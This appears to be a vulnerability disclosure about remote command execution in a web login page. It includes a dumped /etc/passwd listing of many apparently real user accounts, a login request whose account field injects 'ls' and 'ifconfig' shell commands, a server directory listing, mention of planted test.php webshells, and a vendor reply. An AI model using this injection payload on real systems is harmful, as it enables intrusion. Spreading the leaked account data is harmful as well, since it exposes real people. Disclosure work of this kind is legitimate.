yougongming:x:830:830::/share/Home1/yougongming/work:/bin/bash
jiangcui:x:831:831::/share/Home2/jiangcui/work:/bin/bash
lizhensheng:x:832:832::/share/Home3/lizhensheng/work:/bin/bash
xiongxiaoai:x:833:833::/share/Home1/xiongxiaoai/work:/bin/bash
hetao:x:834:834::/share/Home2/hetao/work:/bin/bash
chenjunhui:x:835:835::/share/Home3/chenjunhui/work:/bin/bash
yanglitan:x:836:836::/share/Home1/yanglitan/work:/bin/bash
zhengyanjun:x:837:837::/share/Home2/zhengyanjun/work:/bin/bash
chenke:x:838:838::/share/Home3/chenke/work:/bin/bash
zhaozhiwei:x:839:839::/share/Home1/zhaozhiwei/work:/bin/bash
nixiaoye:x:840:840::/share/Home2/nixiaoye/work:/bin/bash
caobingbing:x:841:841::/share/Home3/caobingbing/work:/bin/bash
wangyuanjin:x:842:842::/share/Home1/wangyuanjin/work:/bin/bash
qinyunfei:x:843:843::/share/Home2/qinyunfei/work:/bin/bash
hanyelang:x:844:844::/share/Home3/hanyelang/work:/bin/bash
zhangxuefeng:x:845:845::/share/Home1/zhangxuefeng/work:/bin/bash
cuidada:x:846:846::/share/Home2/cuidada/work:/bin/bash
youminwen:x:847:847::/share/Home3/youminwen/work:/bin/bash
caoyan:x:848:848::/share/Home1/caoyan/work:/bin/bash
gaoxiaoqin:x:849:849::/share/Home2/gaoxiaoqin/work:/bin/bash
jinyandong:x:850:850::/share/Home3/jinyandong/work:/bin/bash
yaobeibei:x:851:851::/share/Home1/yaobeibei/work:/bin/bash
tanyan:x:852:852::/share/Home2/tanyan/work:/bin/bash
humingge:x:853:853::/share/Home3/humingge/work:/bin/bash
pengwei:x:854:854::/share/Home1/pengwei/work:/bin/bash
liqiang:x:855:855::/share/Home2/liqiang/work:/bin/bash
zhangdai:x:856:856::/share/Home3/zhangdai/work:/bin/bash
ligangling:x:857:857::/share/Home1/ligangling/work:/bin/bash
molinfeng:x:858:858::/share/Home2/molinfeng/work:/bin/bash
zhengzhenjiang:x:859:859::/share/Home3/zhengzhenjiang/work:/bin/bash
zhufeng:x:860:860::/share/Home1/zhufeng/work:/bin/bash
wangyuan:x:861:861::/share/Home2/wangyuan/work:/bin/bash
yuxingguang:x:862:862::/share/Home3/yuxingguang/work:/bin/bash
yulingzhen:x:863:863::/share/Home1/yulingzhen/work:/bin/bash
caoguocheng:x:864:864::/share/Home2/caoguocheng/work:/bin/bash
xusheng:x:865:865::/share/Home3/xusheng/work:/bin/bash
yangdonglin:x:866:866::/share/Home1/yangdonglin/work:/bin/bash
wangtao:x:867:867::/share/Home2/wangtao/work:/bin/bash
heyanbin:x:868:868::/share/Home3/heyanbin/work:/bin/bash
liqingsong:x:869:869::/share/Home1/liqingsong/work:/bin/bash
zhougaoxiang:x:870:870::/share/Home2/zhougaoxiang/work:/bin/bash
yangguohui:x:871:871::/share/Home3/yangguohui/work:/bin/bash
chenjin:x:872:872::/share/Home1/chenjin/work:/bin/bash
zhanglong:x:873:873::/share/Home2/zhanglong/work:/bin/bash
wangchao:x:874:874::/share/Home3/wangchao/work:/bin/bash
qiumin:x:875:875::/share/Home1/qiumin/work:/bin/bash
zhangguobin:x:876:876::/share/Home2/zhangguobin/work:/bin/bash
guoxiaoyu:x:877:877::/share/Home3/guoxiaoyu/work:/bin/bash
zoulingfeng:x:878:878::/share/Home1/zoulingfeng/work:/bin/bash
wangchangming:x:879:879::/share/Home2/wangchangming/work:/bin/bash
wangxiang:x:880:880::/share/Home3/wangxiang/work:/bin/bash
huwenfei:x:881:881::/share/Home1/huwenfei/work:/bin/bash
zhongqihua:x:882:882::/share/Home2/zhongqihua/work:/bin/bash
zhangbin:x:883:883::/share/Home3/zhangbin/work:/bin/bash
zhangcheng:x:884:884::/share/Home1/zhangcheng/work:/bin/bash
lixianwen:x:885:885::/share/Home2/lixianwen/work:/bin/bash
wangdong:x:886:886::/share/Home3/wangdong/work:/bin/bash
majun:x:887:887::/share/Home1/majun/work:/bin/bash
liuyunbo:x:888:888::/share/Home2/liuyunbo/work:/bin/bash
jinliwang:x:889:889::/share/Home3/jinliwang/work:/bin/bash
lixinxiang:x:890:890::/share/Home1/lixinxiang/work:/bin/bash
huangrenmao:x:891:891::/share/Home2/huangrenmao/work:/bin/bash
lusongyuan:x:893:893::/share/Home1/lusongyuan/work:/bin/bash
zhangwei:x:894:894::/share/Home2/zhangwei/work:/bin/bash
gaochaogang:x:895:895::/share/Home3/gaochaogang/work:/bin/bash
tianhaifeng:x:896:896::/share/Home1/tianhaifeng/work:/bin/bash
xiezhefeng:x:897:897::/share/Home2/xiezhefeng/work:/bin/bash
chenningtao:x:898:898::/share/Home3/chenningtao/work:/bin/bash
xulin:x:899:899::/share/Home1/xulin/work:/bin/bash
chenguodong:x:900:900::/share/Home2/chenguodong/work:/bin/bash
kongdeyu:x:901:901::/share/Home3/kongdeyu/work:/bin/bash
luoxiao:x:902:902::/share/Home1/luoxiao/work:/bin/bash
yaoyonggang:x:903:903::/share/Home2/yaoyonggang/work:/bin/bash
fengyan:x:904:904::/share/Home3/fengyan/work:/bin/bash
xuqinzhi:x:905:905::/share/Home1/xuqinzhi/work:/bin/bash
heli:x:906:906::/share/Home2/heli/work:/bin/bash
zhouyinfeng:x:907:907::/share/Home3/zhouyinfeng/work:/bin/bash
yangjie:x:908:908::/share/Home1/yangjie/work:/bin/bash
yumeichun:x:909:909::/share/Home2/yumeichun/work:/bin/bash
zhouhonghai:x:910:910::/share/Home3/zhouhonghai/work:/bin/bash
wanglong:x:911:911::/share/Home1/wanglong/work:/bin/bash
tangyan:x:912:912::/share/Home2/tangyan/work:/bin/bash
quqingdong:x:913:913::/share/Home3/quqingdong/work:/bin/bash
zhangguowei:x:914:914::/share/Home1/zhangguowei/work:/bin/bash
qiandanyi:x:915:915::/share/Home2/qiandanyi/work:/bin/bash
zhoujianping:x:916:916::/share/Home3/zhoujianping/work:/bin/bash
liangqin:x:917:917::/share/Home1/liangqin/work:/bin/bash
leichangqing:x:918:918::/share/Home2/leichangqing/work:/bin/bash
caofeng:x:919:919::/share/Home3/caofeng/work:/bin/bash
sunzhengwu:x:920:920::/share/Home1/sunzhengwu/work:/bin/bash
jinli:x:921:921::/share/Home2/jinli/work:/bin/bash
qiujunfeng:x:922:922::/share/Home3/qiujunfeng/work:/bin/bash
wushude:x:923:923::/share/Home1/wushude/work:/bin/bash
weiyunjie:x:924:924::/share/Home2/weiyunjie/work:/bin/bash
zhouweisheng:x:925:925::/share/Home3/zhouweisheng/work:/bin/bash
shengchenglong:x:926:926::/share/Home1/shengchenglong/work:/bin/bash
lihongliang:x:927:927::/share/Home2/lihongliang/work:/bin/bash
xuziyue:x:928:928::/share/Home3/xuziyue/work:/bin/bash
zhanglong3:x:929:929::/share/Home1/zhanglong3/work:/bin/bash
leixiongfeng:x:930:930::/share/Home2/leixiongfeng/work:/bin/bash
liubin:x:931:931::/share/Home3/liubin/work:/bin/bash
zhangyunkui:x:932:932::/share/Home1/zhangyunkui/work:/bin/bash
zhangjie:x:933:933::/share/Home2/zhangjie/work:/bin/bash
nikenan:x:934:934::/share/Home3/nikenan/work:/bin/bash
outuser1:x:935:935::/share/Home1/outuser1/work:/bin/bash
outuser2:x:936:936::/share/Home2/outuser2/work:/bin/bash
diaoshuo:x:937:937::/share/Home3/diaoshuo/work:/bin/bash
chenlixin:x:938:938::/share/Home1/chenlixin/work:/bin/bash
wangpingping:x:939:939::/share/Home2/wangpingping/work:/bin/bash
xuzhaosong:x:940:940::/share/Home3/xuzhaosong/work:/bin/bash
caixuehua:x:941:941::/share/Home1/caixuehua/work:/bin/bash
luguoyong:x:942:942::/share/Home2/luguoyong/work:/bin/bash
wangtengxing:x:943:943::/share/Home3/wangtengxing/work:/bin/bash
dunbin:x:944:944::/share/Home1/dunbin/work:/bin/bash
lijiaqi:x:945:945::/share/Home2/lijiaqi/work:/bin/bash
chenneng:x:946:946::/share/Home3/chenneng/work:/bin/bash
liuhanxun:x:947:947::/share/Home1/liuhanxun/work:/bin/bash
yinshuxia:x:948:948::/share/Home2/yinshuxia/work:/bin/bash
madandan:x:949:949::/share/Home3/madandan/work:/bin/bash
cuitian:x:951:951::/share/Home2/cuitian/work:/bin/bash
zhangzhenguo:x:952:952::/share/Home3/zhangzhenguo/work:/bin/bash
zhaoanbang:x:953:953::/share/Home1/zhaoanbang/work:/bin/bash
zhangzhiguo:x:954:954::/share/Home2/zhangzhiguo/work:/bin/bash
dongyue:x:955:955::/share/Home3/dongyue/work:/bin/bash
zhaokui:x:956:956::/share/Home1/zhaokui/work:/bin/bash
guoyandong:x:957:957::/share/Home2/guoyandong/work:/bin/bash
shiwentian:x:958:958::/share/Home3/shiwentian/work:/bin/bash
songjia2:x:959:959::/share/Home1/songjia2/work:/bin/bash
duanbin:x:960:960::/share/Home2/duanbin/work:/bin/bash
yuanwei:x:961:961::/share/Home3/yuanwei/work:/bin/bash
outuser3:x:962:962::/share/Home1/outuser3/work:/bin/bash
<meta http-equiv='Refresh' content='2;URL=/ease/App/index.php/Public/login'>用户名不存在或已禁用!


遍历目录可下载各种备份

account=%22%26ls /var/www%26ifconfig%22&password=g00dPa%24%24w0rD&__hash__=e42a907ff9001490dada5f0c13b3c881


account
cache
crash
cvs
db
empty
ftp
games
gdm
joy20150106.tgz
lib
local
lock
log
mail
nis
opt
preserve
run
spool
tmp
www
yp

漏洞证明:

1.PNG

修复方案:

1. 请管理员删除我测试用的一句话,分别在var/www/ease/test.php
和index.php同目录下的test.php
2.修复远程命令执行主要是双引号解析了变量的问题

版权声明:转载请注明来源 jianFen@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-16 08:52

厂商回复:

谢谢支持安全问题,我们马上安排整改加固。

最新状态:

暂无